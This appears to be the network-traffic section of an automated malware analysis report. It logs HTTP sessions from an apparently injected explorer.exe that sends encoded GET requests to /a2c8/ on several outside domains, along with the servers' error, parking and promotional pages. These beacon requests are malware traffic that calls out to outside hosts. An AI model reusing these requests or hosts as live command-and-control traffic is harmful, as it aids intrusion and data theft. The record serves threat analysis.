68 34 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e8 8e b7 e5 8f 96 e5 af 86 e7 a0 81 e4 bb bb e5 8a a1 ef bc 9a 3c 2f 66 6f 6e 74 3e 3c 2f 68 34 3e 3c 2f 70 3e 0a 3c 70 3e 3c 68 34 3e e4 b8 80 e3 80 81 e4 b8 8b e8 bd bd e8 8e b7 e5 8f 96 e5 af 86 e7 a0 81 e7 9a 84 41 50 50 ef bc 9a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e e5 bf ab e6 89 8b e6 9e 81 e9 80 9f e7 89 88 2e 63 6f 6d 2f 22 3e e5 bf ab e6 89 8b e6 9e 81 e9 80 9f e7 89 88 2e 63 6f 6d 3c 2f 68 34 3e 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 3e 3c 68 34 3e e4 ba 8c e3 80 81
                                                                                                                                                                                        Data Ascii: 832<script type="text/javascript">gowechat();function gowechat() {var ua = navigator.userAgent; var isWeixin = ua.indexOf('MicroMessenger') > -1;// if (isWeixin) {window.location.href = 'wx.html'; // }}</script><!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes" /><meta charset="utf-8"><title> - </title></head><body><p><h4><font color="#FF0000"> - </font></h4></p><p><a href="http://www.metalightspeed.com/"><h4>www.metalightspeed.com</h4></a></p><p><h4></h4></p></p><h4></h4></p><p><h4><font color="#FF0000"></font></h4></p><p><h4>APP<a href="http://www..com/">.com</h4></a></p><p><h4>
                                                                                                                                                                                        Jun 10, 2022 07:57:57.885787964 CEST8676INData Raw: e5 ae 89 e8 a3 85 e7 99 bb e5 bd 95 ef bc 8c e7 a1 ae e8 ae a4 e6 88 91 e7 9a 84 e9 82 80 e8 af b7 e5 90 8e ef bc 8c e7 82 b9 41 50 50 e9 a6 96 e9 a1 b5 e5 b7 a6 e4 b8 8a e8 a7 92 ef bc 8c e5 bc b9 e5 87 ba e8 8f 9c e5 8d 95 ef bc 8c e6 8a 8a e5
                                                                                                                                                                                        Data Ascii: APP44~</h4></p><p><h4></h4></p><img src="https://static.xiaobaiduwqw.com
                                                                                                                                                                                        Jun 10, 2022 07:57:57.885838985 CEST8676INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        15192.168.11.204979243.225.157.24580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:58:18.744190931 CEST8685OUTGET /a2c8/?6lbL=qTfTz0&Djf=/K5hgtIqUus/DloXEMxkOj6GgPGVswIXrDjH+XzUkbkk6TDv4WNyBCGfY3zU+FC2J3jS HTTP/1.1
                                                                                                                                                                                        Host: www.ranabroimpexp.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:58:18.930717945 CEST8686INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:58:18 GMT
                                                                                                                                                                                        Server: Apache/2.4.18 (Ubuntu)
                                                                                                                                                                                        Content-Length: 283
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 61 6e 61 62 72 6f 69 6d 70 65 78 70 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.ranabroimpexp.com Port 80</address></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        16192.168.11.2049793176.53.69.15180C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:58:37.425884008 CEST8687OUTGET /a2c8/?Djf=j/Ps+a/VuX4QoBvcMreOK2UI1STzAixbxZBALrwc64bjPCb9njwh7+nFlquJ6zY9vl55&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.onlinesinavsistemi.xyz
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:58:37.484652996 CEST8688INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                        X-AspNet-Version: 4.0.30319
                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                        X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:56:21 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 1916
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 33 39 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 20 77 69 64 74 68 3a 20 34 34 30 70 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 61 75 74 6f 3b 20 77 68
                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <title>The resource cannot be found.</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:pointer; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; wh
                                                                                                                                                                                        Jun 10, 2022 07:58:37.484716892 CEST8689INData Raw: 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20
                                                                                                                                                                                        Data Ascii: ite-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style> </head> <body bgcolor="white"> <span><H1>Serve


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        17192.168.11.2049794199.59.243.22080C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:59:02.586786032 CEST8690OUTGET /a2c8/?Djf=iEw+cJwvtv+bQOCPj3F7KZu21Rs9fexzItYbFNxodrXSDd9r0rFLMIC1b94eFbixOM9K&YPcp=8p-DO HTTP/1.1
                                                                                                                                                                                        Host: www.lax0.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777235031 CEST8691INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:59:02 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: parking_session=14a98d28-863f-5611-e906-cdffdeefc34f; expires=Fri, 10-Jun-2022 06:14:02 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fu/1jA6eGBr7uOToGbzbXrxkDt8Tw7NSUiutfn70gjMwuqC6T7/bgShniGVy9WaCyJwJf8kuG4iAn/GydQBKHw==
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Cache-Control: no-store, must-revalidate
                                                                                                                                                                                        Cache-Control: post-check=0, pre-check=0
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Data Raw: 34 62 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 75 2f 31 6a 41 36 65 47 42 72 37 75 4f 54 6f 47 62 7a 62 58 72 78 6b 44 74 38 54 77 37 4e 53 55 69 75 74 66 6e 37 30 67 6a 4d 77 75 71 43 36 54 37 2f 62 67 53 68 6e 69 47 56 79 39 57 61 43 79 4a 77 4a 66 38 6b 75 47 34 69 41 6e 2f 47 79 64 51 42 4b 48 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61
                                                                                                                                                                                        Data Ascii: 4bf<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fu/1jA6eGBr7uOToGbzbXrxkDt8Tw7NSUiutfn70gjMwuqC6T7/bgShniGVy9WaCyJwJf8kuG4iAn/GydQBKHw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin></hea
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777288914 CEST8692INData Raw: 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49
                                                                                                                                                                                        Data Ascii: d><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiMTRhOThkMjgtODYzZi01NjExLWU5MDYtY2RmZmRlZWZjMzRmIiwicGFnZV90aW1lIjoxNjU0ODQwNzQyLCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy5sYXgwLmNvbVwvYTJjOFwvP0RqZj1pRXcrY0p3dnR2K2
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777323961 CEST8692INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        18192.168.11.2049796185.104.28.23880C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:59:18.963219881 CEST8699OUTGET /a2c8/?Djf=AplE9LD72/xgVAg7E91FKL+rPo1U0v89Attzn1Fzu6gMFI5vxyD2OErKmqoT1DuyJNiH&YPcp=8p-DO HTTP/1.1
                                                                                                                                                                                        Host: www.tuinkunst.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:59:18.981053114 CEST8700INHTTP/1.1 404 Not Found
                                                                                                                                                                                        date: Fri, 10 Jun 2022 05:59:18 GMT
                                                                                                                                                                                        server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30
                                                                                                                                                                                        content-length: 203
                                                                                                                                                                                        content-type: text/html; charset=iso-8859-1
                                                                                                                                                                                        connection: close
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 32 63 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a2c8/ was not found on this server.</p></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        2192.168.11.204977323.227.38.7480C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:53:31.120450020 CEST8588OUTGET /a2c8/?6lbL=qTfTz0&Djf=9EsqhgYJ7gNCuyDVUAbmGxK1wm9jM9gbBQ+iilDrWSOhprOSHc5xNSdxhhACbSLapwdF HTTP/1.1
                                                                                                                                                                                        Host: www.animehub.store
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:53:31.159451962 CEST8590INHTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:53:31 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Sorting-Hat-PodId: 190
                                                                                                                                                                                        X-Sorting-Hat-ShopId: 62128619711
                                                                                                                                                                                        X-Dc: gcp-europe-west1
                                                                                                                                                                                        X-Request-ID: ccb56c71-84fa-4c77-ac00-04576f4129a6
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 718fd8d98bac9bb6-FRA
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
                                                                                                                                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                                                                                                                                                                                        Jun 10, 2022 07:53:31.159513950 CEST8591INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                                                                                                                                                                                        Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
                                                                                                                                                                                        Jun 10, 2022 07:53:31.159563065 CEST8592INData Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                                                                                                                                                                                        Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                                                                                                                                                                                        Jun 10, 2022 07:53:31.159609079 CEST8594INData Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                                                                                                                                                                                        Data Ascii: " }, "ja": { "title": "", "content-title": "
